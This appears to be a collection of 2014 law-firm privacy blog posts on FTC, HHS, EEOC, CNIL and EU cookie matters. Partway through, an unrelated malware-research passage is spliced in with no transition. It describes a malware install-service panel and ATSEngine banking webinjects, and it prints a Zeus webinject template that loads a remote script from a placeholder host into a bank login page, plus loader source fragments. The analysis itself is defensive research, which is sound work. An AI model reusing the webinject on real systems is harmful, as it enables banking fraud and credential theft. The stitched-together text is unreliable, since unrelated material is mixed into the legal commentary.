On April 9, 2014, the U.S. Court of Appeals for the Sixth Circuit not only affirmed summary judgment in EEOC v. Kaplan Higher Education Corp., et al., but also chastised the Equal Employment Opportunity Commission (“EEOC”) for applying a flawed methodology in its attempts to prove that using credit checks as a pre-employment screen had an unlawful disparate impact on African-American applicants.

The Sixth Circuit began its opinion by noting that the EEOC sued the defendants for using the same type of background check the EEOC itself uses. The Court further acknowledged that Kaplan has legitimate business justifications for running credit checks on applicants for senior-executive positions, accounting and other positions with access to company financials or cash, and positions with access to student financial-aid information. Those justifications stem from Kaplan’s own history: the company had discovered that some of its financial-aid officers had stolen payments that belonged to students, and that some of its executives had engaged in self-dealing by hiring relatives as vendors.

But the focal point of the Sixth Circuit opinion is the reliability, or lack thereof, of the “race rating” process crafted by the EEOC’s expert, Kevin Murphy. Because Kaplan’s credit-check policy is racially blind, the EEOC subpoenaed records from various states’ departments of motor vehicles. In response to these subpoenas, eleven states provided records that identified an applicant’s race, while thirty-six states and the District of Columbia provided color copies of drivers’ license photos for approximately 900 applicants. To address these photos, Murphy devised the “race rating” process, whereby a team of five “race raters” reviewed the drivers’ license photos to classify the race of each applicant for purposes of Murphy’s statistical assessment of Kaplan’s credit-check policy. The process had numerous flaws: the raters had no particular expertise in race rating, they failed to reach consensus 11.7% of the time, Murphy provided the raters with the applicants’ names, and, notably, the process yielded statistical “fail” rates that were higher than the actual “fail” rates of Kaplan’s credit-check policy. Quoting directly from the Court:

The EEOC brought this case on the basis of a homemade methodology, crafted by a witness with no particular expertise to craft it, administered by persons with no particular expertise to administer it, tested by no one, and accepted only by the witness himself.

The Court found that the district court did not abuse its discretion in excluding Murphy’s testimony.

What this case signifies for employers is that there are viable challenges an employer can make to attack the EEOC’s disparate impact theory, including challenges to the expertise of the EEOC’s expert as well as to the methodology and results that expert espoused.

Accordingly, when faced with an EEOC disparate impact investigation or charge, employers should consider arming themselves with consulting and/or potential testifying experts early on who can help formulate attacks against the EEOC’s disparate impact theories. As for the EEOC’s credit check/criminal background check crusade, this case demonstrates yet another instance where the EEOC has failed to successfully prove that an employer’s policy has a disparate impact on minority applicants.

French Data Protection Authority Reviews 100 Mobile Apps During Internet Sweep

On May 13, 2014, the French data protection authority (“CNIL”) decided to examine the 100 mobile apps most commonly used in France.

In particular, the CNIL indicated that it will examine whether the mobile apps properly inform users of:

  • the categories of personal data collected (such as location data, contacts and device identifiers);
  • the purposes for which the data are collected;
  • whether personal data are shared with third parties; and
  • the right of mobile app users to object to the collection and sharing of their personal data.

This review takes place in connection with the Global Privacy Enforcement Network’s (“GPEN”) second annual enforcement sweep, which involves the CNIL and 26 other data protection authorities. The review will be conducted using a common grid shared by all of the participating data protection authorities, in order to provide an inventory of mobile app practices worldwide, including country-specific activities.

The CNIL announced that it may carry out formal investigations and issue sanctions if its initial findings reveal serious breaches of the French Data Protection Act.

GPEN is an international network of more than 40 privacy enforcement authorities, including the U.S. Federal Trade Commission. Its mission includes connecting privacy authorities around the world to facilitate international privacy enforcement cooperation and coordination. GPEN conducted its first annual enforcement sweep in 2013, focusing on online transparency regarding organizations’ privacy practices. Notably, participation in the annual GPEN enforcement sweep increased from 19 authorities last year to 27 authorities this year.

U.S. Chamber of Commerce and Hunton Release Report on the Importance of Cross-Border Data Transfers to Global Prosperity

On May 12, 2014, the U.S. Chamber of Commerce released a report highlighting the benefits of cross-border data transfers across all sectors of the economy. Hunton & Williams LLP’s Global Privacy and Cybersecurity team developed the report with the Chamber of Commerce. The report, Business Without Borders: The Importance of Cross-Border Data Transfers to Global Prosperity, presents pragmatic solutions for developing international mechanisms that both protect privacy and facilitate cross-border data flows.

The report identifies key concepts critical to ensuring agile cross-border data transfer regimes that will support the global data flows of the future, including:

  • Recognition that there are many different approaches to regulating cross-border data transfers, and that differing mechanisms can ensure a similar desired level of data protection.
  • Movement away from rigid one-size-fits-all regulations toward more outcome-focused regimes.
  • A clear delineation between the issue of government access to data and the distinct issue of cross-border data transfers in a commercial context.
  • Assurance that the frameworks we develop today are fit for tomorrow.
  • Implementing strong, binding trade agreement commitments that prohibit data localization requirements, support unimpeded data flows, and encourage interoperability among privacy regimes.

“Many of the cross-border data transfer restrictions currently in place were established prior to the digital revolution,” said Lisa Sotto, head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP. “The laws were not crafted to address the ways in which businesses and consumers use data today. We need to rethink how we approach cross-border data flows so the global economy can continue to thrive now and into the future.”

Read the U.S. Chamber of Commerce’s blog entry on the report.

Read Hunton & Williams’ press release.

Sotto Addresses Cybersecurity Threat Preparation and Response

On May 7, 2014, IronBox Secure File Transfer hosted a webinar featuring “Queen of Breach” attorney Lisa Sotto, who shared her top tips in the event of a data breach. Lisa Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, discussed the current cyber risk landscape and led participants through a hypothetical data breach scenario. She taught participants how to manage a data breach if the worst happens and provided key steps companies should take to prepare proactively for a cybersecurity event.

Participants were polled during the webinar, and the results showed:

  • Only 34% of participants have had specialized outside counsel review their business’ cybersecurity policies and procedures
  • Only 27% of participants felt “truly prepared” for a major cybersecurity event.

Access the full webinar and other related materials.

FTC Announces Settlement with American Apparel for Falsely Claiming Compliance with the Safe Harbor Framework

On May 9, 2014, the Federal Trade Commission announced a settlement with clothing manufacturer American Apparel related to charges that the company falsely claimed to comply with the U.S.-EU Safe Harbor Framework. According to the FTC’s complaint, the company violated Section 5 of the FTC Act by deceptively representing, through statements in its privacy policy, that it held a current Safe Harbor certification even though it had allowed the certification to expire.

The U.S.-EU Safe Harbor Framework is a cross-border data transfer mechanism that enables certified organizations to move personal data from the European Union to the United States in compliance with European data protection laws. To join the Safe Harbor Framework, a company must self-certify to the Department of Commerce that it complies with seven privacy principles (notice, choice, onward transfer, security, data integrity, access and enforcement) and related requirements that have been deemed to meet the EU’s adequacy standard.

Although the Commission alleged that the company’s conduct violated Section 5 of the FTC Act, the FTC noted that this does not necessarily mean the company committed any substantive violations of the Safe Harbor Framework’s privacy principles.

The proposed settlement agreement prohibits American Apparel from misrepresenting “in any manner, expressly or by implication, the extent to which [it] is a member of, adheres to, complies with, is certified by, is endorsed by, or otherwise participates in any privacy or security program sponsored by the government or any other self-regulatory or standard-setting organization”, including the U.S.-EU Safe Harbor Framework and the U.S.-Swiss Safe Harbor Framework.

In the press release accompanying the settlement, Jessica Rich, Director of the FTC’s Bureau of Consumer Protection, stated that “[t]he FTC is committed to making sure that when companies claim they’re participating in the U.S.-EU Safe Harbor Framework, they’re abiding by the terms of the program.”

Read the FTC Business Center Blog’s post about recent Safe Harbor settlements.

Update: On June 25, 2014, the FTC approved the final settlement order with American Apparel.

FTC Announces Settlement with Snapchat After Alleged Privacy and Security Misrepresentations

On May 8, 2014, the Federal Trade Commission announced a proposed settlement with Snapchat, Inc. (“Snapchat”) stemming from allegations that the company’s privacy policy misrepresented its privacy and security practices, including how the Snapchat mobile app worked. Snapchat’s app supposedly allowed users to send and receive photo and video messages known as “snaps” that would “disappear forever” after a certain time period. The FTC alleged that, in fact, it was possible for recipients to save snaps indefinitely, regardless of the sender-designated expiration time.

According to the complaint filed by the FTC, Snapchat made several misrepresentations about certain features of its app and the information collected through the app, including the following:

  • Snapchat portrayed its app as a “service for sending ‘disappearing’ photo and video messages” that required the sender to select a period of time (of a maximum of 10 seconds) within which the recipient could view the snap. The FTC’s complaint, however, indicates that there were several ways recipients could save and view snaps indefinitely, and that these methods were publicly available on the Internet at little or no cost. In addition, the FTC noted that although the flaw had been brought to Snapchat’s attention by a security researcher, Snapchat did nothing to mitigate the flaw for months.
  • Snapchat represented in the FAQs published on its website that the company would notify the sender if a recipient took a screenshot of the sender’s snap. But the FTC noted that the screenshot detection mechanism could easily be circumvented, so some senders were not notified when screenshots were taken of their snaps.
  • Snapchat allegedly collected information such as geolocation data and users’ contacts information contrary to representations the company made in its privacy policy.

The FTC also noted that numerous consumers complained that their phone numbers had been misused. According to the FTC, Snapchat failed to employ reasonable security measures to protect personal information from misuse and unauthorized disclosure by failing to verify phone numbers during the registration process.

The proposed settlement agreement prohibits Snapchat from misrepresenting the extent to which the company maintains the privacy, security and confidentiality of users’ information. As in other recent settlement agreements, Snapchat is required under the proposed settlement to implement a comprehensive privacy program subject to assessment by an independent privacy professional on a biennial basis for the next 20 years.

The FTC’s Business Center Blog post regarding Snapchat highlighted that “Snapchat is hardly the first company to get an early heads-up from a security researcher about a privacy hole in their product. Certainly, the preferred scenario is if glitches are spotted before you go to market. But the next best thing is to monitor what people are saying about your product and act ASAP if flaws come to light.”

The Snapchat case is part of an enforcement sweep by the Global Privacy Enforcement Network (“GPEN”), which is an international network of more than 40 privacy enforcement authorities, including the FTC.

Update: On December 31, 2014, the FTC approved the final settlement order with Snapchat.

HHS Announces 4.8 Million Dollar Settlement with New York Hospital and Medical School for Potential HIPAA Violations

On May 7, 2014, the Department of Health and Human Services (“HHS”) announced that NewYork-Presbyterian Hospital (“NYP”) and Columbia University (“CU”) agreed to pay a combined $4.8 million, the largest HIPAA settlement to date, to resolve charges that they potentially violated the HIPAA Privacy and Security Rules.

According to HHS, NYP and CU operate a shared data network that links to patient information systems containing electronic protected health information (“ePHI”). The two entities submitted a joint breach report in September 2010 following the discovery that the ePHI of 6,800 individuals had been improperly disclosed due to a lack of technical safeguards, and was accessible to the public using Internet search engines. The ePHI included patient statuses, vital signs, medications and laboratory results.

Following the submission of the breach report, the HHS Office for Civil Rights (“OCR”) initiated an investigation and determined that neither entity had conducted an accurate and thorough risk analysis or developed an adequate risk management plan. OCR further concluded that NYP failed to implement appropriate policies and procedures for protecting its databases.

NYP agreed to pay $3.3 million and CU agreed to pay $1.5 million. In the resolution agreements, both entities also agreed to Corrective Action Plans that required each entity to:

  • undertake a thorough risk analysis;
  • develop and implement a risk management plan;
  • review and revise policies and procedures on information access management and device and media controls;
  • train staff that have access to ePHI; and
  • provide progress reports.

Additionally, CU must also “develop a process to evaluate any environmental or operational changes” that impact the security of the ePHI it maintains.

In announcing the settlement, Christina Heide, Acting Deputy Director of Health Information Privacy for OCR, noted that NYP and CU share the joint compliance burden and encouraged other entities to “make data security central to how they manage their information systems.” This marks the fourth HIPAA settlement in 2014, bringing the combined total monetary penalties so far this year to more than $7 million.

Bojana Bellamy Selected to Participate in EU-U.S. Privacy Bridge Initiative

Hunton & Williams LLP’s Centre for Information Policy Leadership president, Bojana Bellamy, has been selected to participate in the “Privacy Bridge Project,” a new transatlantic initiative that seeks to develop practical solutions to bridge the gap between European and U.S. privacy regimes. Bellamy joins a distinguished group of approximately 20 privacy experts from the EU and U.S., convened by Jacob Kohnstamm, Chairman of the Dutch Data Protection Authority and former Chairman of the Article 29 Working Party.

Although the regions share a common goal of effective privacy protection, misunderstandings and differences between transatlantic legal systems pose challenges to the free flow of information and privacy protection. The Privacy Bridge Project, which will address these challenges, is organized jointly by Daniel J. Weitzner of the Massachusetts Institute of Technology Information Policy Project and Nico van Eijk of the Institute for Information Law at the University of Amsterdam.

The first meeting of the Privacy Bridge Project was held in Amsterdam at the end of April 2014. The group will participate in four further meetings to prepare an initial report outlining policy recommendations and practical guidance for enabling cross-border data flows and promoting privacy on both sides of the Atlantic. The report will be presented at the 2015 International Conference of Data Protection and Privacy Commissioners, to be hosted by Kohnstamm in the Netherlands. Over the next 18 months, the group will prepare a consensus white paper proposing a modus vivendi between the two regions.

“Bridging existing gaps in the privacy frameworks of the European Union and the United States is vital for businesses, governments and citizens, and essential for economic prosperity. We must work from a set of common values and shared goals, and build on those commonalities rather than focus on differences,” Bellamy said. “I’m grateful to Jacob Kohnstamm for his vision and leadership on this important mission and excited by the possibilities. It will be an honor to work with such an esteemed group of privacy leaders.”

The Centre for Information Policy Leadership’s Senior Policy Advisor Fred H. Cate, Distinguished Professor and Director of the Indiana University Center for Applied Cybersecurity Research, also will participate in the project in his academic capacity.

Read the full press release.

GPEN Announces Coordinated International Enforcement Sweep on Mobile App Privacy

On May 6, 2014, the Office of the Privacy Commissioner of Canada announced the Global Privacy Enforcement Network’s (“GPEN’s”) second annual enforcement sweep. The sweep will focus on mobile app privacy and how mobile apps collect and use personal data.

From May 12 to 18, 2014, GPEN member authorities “will be looking at the types of permissions an app is seeking, whether those permissions exceed what would be expected based on the app’s functionality, and most importantly from a transparency perspective, how the app explains to consumers why it wants the personal information and what it will do with it.” Any problems identified during the sweep will result in follow-up enforcement actions and other outreach to address the affected apps.

GPEN is an international network of more than 40 privacy enforcement authorities, including the U.S. Federal Trade Commission. Its mission includes connecting privacy authorities around the world to facilitate international privacy enforcement cooperation and coordination. GPEN conducted its first annual enforcement sweep in 2013, focusing on online transparency regarding organizations’ privacy practices. It is noteworthy that participation in the annual GPEN enforcement sweep increased from 19 authorities last year to 27 authorities this year.

Coinciding with GPEN’s enforcement sweep, on May 8, 2014, the Federal Trade Commission announced a proposed settlement with Snapchat, Inc. stemming from allegations that the company misrepresented its privacy and security practices in its privacy policy, including how Snapchat’s mobile app worked.

SEC Issues New Guidance on the Use of Social Media

On April 21, 2014, the Securities and Exchange Commission’s Division of Corporation Finance published new Compliance and Disclosure Interpretations (“C&DIs”) concerning the use of social media in certain securities offerings, business combinations and proxy contests. Notably, the C&DIs permit the use of an active hyperlink to satisfy the cautionary legend requirements in social media communications when the social media platform limits the text or number of characters that may be included (e.g., Twitter). The C&DIs also clarify that postings or messages re-transmitted by unrelated third parties generally will not be attributable to the issuer (so issuers will not be required to ensure that third parties comply with the guidance). In addition, requirements regarding cautionary legends contemplated by the C&DIs apply to both issuers and other soliciting parties in proxy fights or tender offers. Accordingly, although the new guidance will allow issuers to communicate with their shareholders and potential investors via social media, it also may prove useful to activists in proxy fights and tender offers.

Read the full client alert on the SEC’s new C&DIs.

CFPB Proposes New GLB Privacy Notice Rule

On May 6, 2014, the Consumer Financial Protection Bureau (“CFPB”) announced a new proposed rule impacting privacy notices that financial institutions are required to issue under the Gramm-Leach-Bliley Act (“GLB”). Under the current GLB Privacy Rule, financial institutions must mail an annual privacy notice (the “GLB Privacy Notice”) to their customers that sets forth how they collect, use and disclose those customers’ nonpublic personal information (“NPI”) and whether customers may limit such sharing.

Under the proposed rule, certain financial institutions may forego the annual mailing requirement and instead include a brief disclosure in a billing statement or other communication that the GLB Privacy Notice is available online, then post that notice “in a clear and conspicuous manner” on the institution’s website. Financial institutions also must inform consumers that they may request a paper version of the GLB Privacy Notice by calling a toll-free number. To qualify for this online privacy notice option:

  • A financial institution must not share NPI with nonaffiliated third parties in a manner that requires an opt-out right be provided to customers;
  • The GLB Privacy Notice must not include an opt out pursuant to the Fair Credit Reporting Act;
  • The GLB Privacy Notice cannot be the only notice the financial institution provides to satisfy FCRA requirements;
  • The GLB Privacy Notice must not have changed since the last time it was provided to customers; and
  • The GLB Privacy Notice must use the model form regulators have developed to comply with the notice requirement.

If a financial institution does not meet all of the requirements listed above, it must continue to mail the GLB Privacy Notice annually to its customers. In announcing the proposed rule, CFPB Director Richard Cordray noted that the changes would both improve customers’ abilities to “find and access privacy policies” and reduce the costs “for industry to provide disclosures.”

German Court Requires Clear Opt-Out Notices for Web Analytics

On February 18, 2014, the Frankfurt am Main Regional Court issued a ruling addressing the use of opt-out notices for web analytics tools. The case concerned Piwik web analytics software and its “AnonymizeIP” function. The court held that website users must be informed clearly about their right to object to the creation of pseudonymized usage profiles. This information must be provided when a user first visits the website (e.g., via a pop-up or highlighted/linked wording on the first page) and must be accessible at all times (e.g., via a privacy notice).
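For reference, the "AnonymizeIP" function at issue is enabled in Piwik's tracker configuration. A representative snippet, based on Piwik's documented settings (shown for illustration only):

```ini
; config/config.ini.php (Piwik): mask the trailing bytes of visitor IP
; addresses before they are stored, so only a truncated address is kept.
[Tracker]
ip_address_mask_length = 2
```

As the ruling makes clear, enabling this setting alone is not enough: pseudonymized usage profiles may still be created, and users must still be informed of their right to object.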

Although the website provider in question had enabled an “anonymizing” function in Piwik, the court found that pseudonymized usage profiles were being created. To make that determination, the court drew on the Schleswig-Holstein data protection authority’s (“DPA’s”) detailed analysis of Piwik, as well as the federal German DPA’s formal resolution on web analytics.

Notably, the case was brought by a competitor of the website provider who argued that the website provider breached Germany’s Unfair Competition Act. This case, along with the Bavarian DPA’s reports on Adobe Analytics and Google Analytics, illustrates that web analytics continue to be a hot topic in Germany. The case also represents a broader trend in Germany of treating violations of data protection law as breaches of unfair competition law.

Install service for Malware affiliates and individuals

This install service had been running for a long time, but the server recently died.
The people targeted are in Russia, Ukraine, Belarus, Kazakhstan, and Uzbekistan.


Statistics by days:
(Date, Unique visits, General visits)

Statistics by countries:
(Countries, Unique visits, Percentage, General visits)

Statistics by version:
(Version, Unique visits, Percentage, General visits)

Statistics by time:
(Time,  Users)

(Date, Already installed, ???? installed, Successfully installed, Copy failed, Modify failed, Register failed)

(Date, Begin update, Downloaded update, Executed update, No ATL, Execution failed)

Statistics by tasks:
(Date, Start of xxxx, Searches, Clicks, ???)

Statistics by sites:

Statistics by ads:

Loader, users list:
 (Nickname, ID, Priority, Ban, GEO, Days, General limit, Working conditions, Today, Summary, Size, Time, File)

There are some interesting people in this listing:
Severa (known for FakeAV, spam)
Malwox affiliate (Mayachok.1)
Feodal cash affiliate (Bitcoin malware)

And if you want to know about the EXE files being loaded: they are all malware (Zeus, SpyEye, Russian lockers, spam bots, Mayachok, etc.).
The x64 Zbot covered by Kaspersky also came from here.
The executables were rotated and refreshed constantly; around 400 samples per day could be pulled from this system.
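Counting distinct samples from a rotating loader comes down to deduplicating downloads by hash, since the same binary is re-served many times between refreshes. A minimal sketch (the polling loop and URL are hypothetical; only the hashing logic is concrete):

```python
import hashlib

def count_unique_samples(payloads):
    """Count distinct binaries among downloaded payloads by SHA-256 digest.

    A rotating loader re-serves the same file many times, so raw download
    counts overstate the number of samples; hashing deduplicates them.
    """
    return len({hashlib.sha256(p).hexdigest() for p in payloads})

# Hypothetical polling loop (URL is illustrative, not from the panel):
#   while True:
#       payloads.append(urllib.request.urlopen("http://loader.example/file.exe").read())
#       time.sleep(60)
```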

Download statistics for client 191 ( Malwox TEST ):
(Date,  Derved, Executed, Ctr, Create, Exists, Down, Run, Unp)

Edit user:

Add user:

Schedule for user:

Menu: users list, add, FTP, Stats.

For the FTP list, most of the accounts had a shell on them.


From the source:
$useZorkaJob = 0; //схч чрїюфр
$useSputnikJob = 0;
$useRekloJob = 0;
$useSpoiskJob = 0;
$useBegunCheatJob = 0;
Begun is one of the biggest ad services in Russia.


ATSEngine injects can often be found inside Zeus configs. They make the webinjects more dynamic, because most of the content is hosted remotely and can be updated far more easily than by sending a new config to all the bots.
That is the main difference between this and a standard webinject inside Zeus:
a standard inject only lets you make a static change to the page, while ATSEngine gives you many more options, for example customized webinjects, pop-ups, online requests for tokens, etc.
ATSEngine also has a Jabber alert feature: it lets the fraudster know when the victim is logged in to his bank account, so it is a good time to backconnect to him (with the VNC feature of Zeus) and do the transaction.
Most ATSEngine panels are also hosted on SSL, because banks use SSL.
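Wiring a Zeus bot to an ATSEngine panel usually amounts to injecting a remote script tag into the targeted page, so the actual payload (such as the figrabber.js shown below) can be changed server-side without touching the bots. A sketch in the standard Zeus webinject syntax (hostnames and URLs are placeholders, not taken from a real config):

```
set_url https://www.bank.example/login* GP
data_before
</head>
data_end
data_inject
<script type="text/javascript" src="https://ats.example/figrabber.js"></script>
data_end
data_after
data_end
```

A static inject would put the replacement HTML directly in the `data_inject` section; pointing it at a remote script is what makes the ATSEngine approach dynamic.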

ATSEngine on a ZeusVM config.

ATSEngine on a Citadel config.
Example of figrabber.js from an ATSEngine panel.

Some people also run a business around this type of webinject. For example:
He is offering a service for writing injects.
The title says "Auto-uploads and injects from professionals for professionals."
The rest of the text explains how the service works; it is more a terms-and-conditions post than a technical description of the product, covering moneyback, privacy, guarantees and other matters.
They don't write mobile botnets, trojan horses, traffic direction systems or any other malware besides injects, and they don't guarantee bypassing protections (like Rapport).
In any case, yummba is known for writing injects for ATSEngine.

Let's have a look at a C&C now.



Options main:

Options Jabber:

Another panel, on SSL:

Another panel, on SSL:

Another panel, still on SSL:


Additional fields rules:

Additional fields rules (texts):

Edit rule:

Edit text:

VBV/MCSC rules:

Add a rule:


Options (CC Checker):

Files, dumped from another panel, targeting La banque Postal (a French bank):

White House Releases Report on Big Data

On May 1, 2014, the White House released a report examining how Big Data is affecting government, society and commerce. In addition to questioning longstanding tenets of privacy legislation, such as notice and consent, the report recommends (1) passing national data breach legislation, (2) revising the Electronic Communications Privacy Act (“ECPA”), and (3) advancing the Consumer Privacy Bill of Rights.

The report states that consumers have a “right to know if [their] information has been stolen or otherwise improperly exposed” and continues that data breaches are currently regulated by a “patchwork” of 47 state laws. The report recommends that Congress pass legislation providing a single data breach standard, similar to the Obama administration’s May 2011 proposal. The data breach legislation should include “reasonable time periods for notification, minimize interference with law enforcement investigations, and potentially prioritize notification about large, damaging incidents over less significant incidents.”

The report also recommends revising ECPA to confirm that online, digital content is protected in the same manner as hard copy materials. For example, the report recommends removing distinctions in ECPA that focus on how long an email has been left unread.

The White House’s Big Data report also recommends advancing the Consumer Privacy Bill of Rights released by the Obama administration in February 2012. Specifically, the report calls on the Department of Commerce to seek public comment on the Consumer Privacy Bill of Rights, and then draft legislation for review by the President and Congress.

Read the White House’s Fact Sheet on the Big Data and Privacy Working Group Review.

Belgian Privacy Commission Opens Public Consultation on Draft Cookie Recommendation

On April 24, 2014, the Belgian Data Protection Authority (the “Privacy Commission”) published a Draft Recommendation regarding cookie usage, inviting all stakeholders to provide their input on the text. The Draft Recommendation clarifies the Belgian legal framework for the use of cookies and similar technologies, examining in detail the different purposes for which cookies and similar technologies may be used (e.g., authentication, storage of preferences) and explaining the steps to be taken to ensure compliance for each type of cookie use.

In particular, the Draft Recommendation explains how to comply with the new obligation to obtain prior consent before placing or accessing cookies and similar technologies on users’ devices, as provided by Article 129 of the Belgian Electronic Communications Act (which transposes Article 5.3 of the revised e-Privacy Directive 2002/58/EC). Consent is not required if the cookie or similar technology is used for the sole purpose of carrying out the transmission of a communication over an electronic communications network, or if it is strictly necessary for the provision of a service requested by the user. The Draft Recommendation provides examples of cookies that fall under these exceptions (e.g., “shopping basket” cookies, authentication cookies).

According to the Draft Recommendation, to obtain valid consent to use cookies and similar technologies, users must have the opportunity to accept only certain cookies and refuse others, and be able to change their choices later on. Valid consent requires an affirmative action by the user. In addition, prior to providing consent, users must have a chance to review a cookie policy that details the different categories of cookies and their purposes, the categories of information stored, the retention period, how to delete cookies, and any disclosures of information to third parties. The Draft Recommendation provides useful examples of such cookie policies.
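The granular, affirmative consent model described above is straightforward to express in code. A minimal sketch (category names are illustrative; it assumes per-category consent choices are recorded server-side from an affirmative user action):

```python
# Cookie categories exempt from consent under Article 129 (carrying out the
# transmission of a communication, or strictly necessary for a service
# requested by the user), per the Draft Recommendation's examples.
EXEMPT = {"authentication", "shopping_basket"}

def may_set_cookie(category, consents):
    """Decide whether a cookie of the given category may be placed.

    `consents` maps category -> bool, recorded only from an affirmative
    user action; the absence of a recorded choice means no consent.
    """
    if category in EXEMPT:
        return True
    return consents.get(category, False)
```

Under this model a user can accept, say, analytics cookies while refusing advertising cookies, and can later change either choice, which is what the Draft Recommendation requires for valid consent.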

Comments on the Draft Recommendation may be sent to the Privacy Commission by mail (rue de la Presse, 35 – 1000 Brussels) or by email. The public consultation will be closed on July 31, 2014, after which the Privacy Commission will publish the final version of the Recommendation.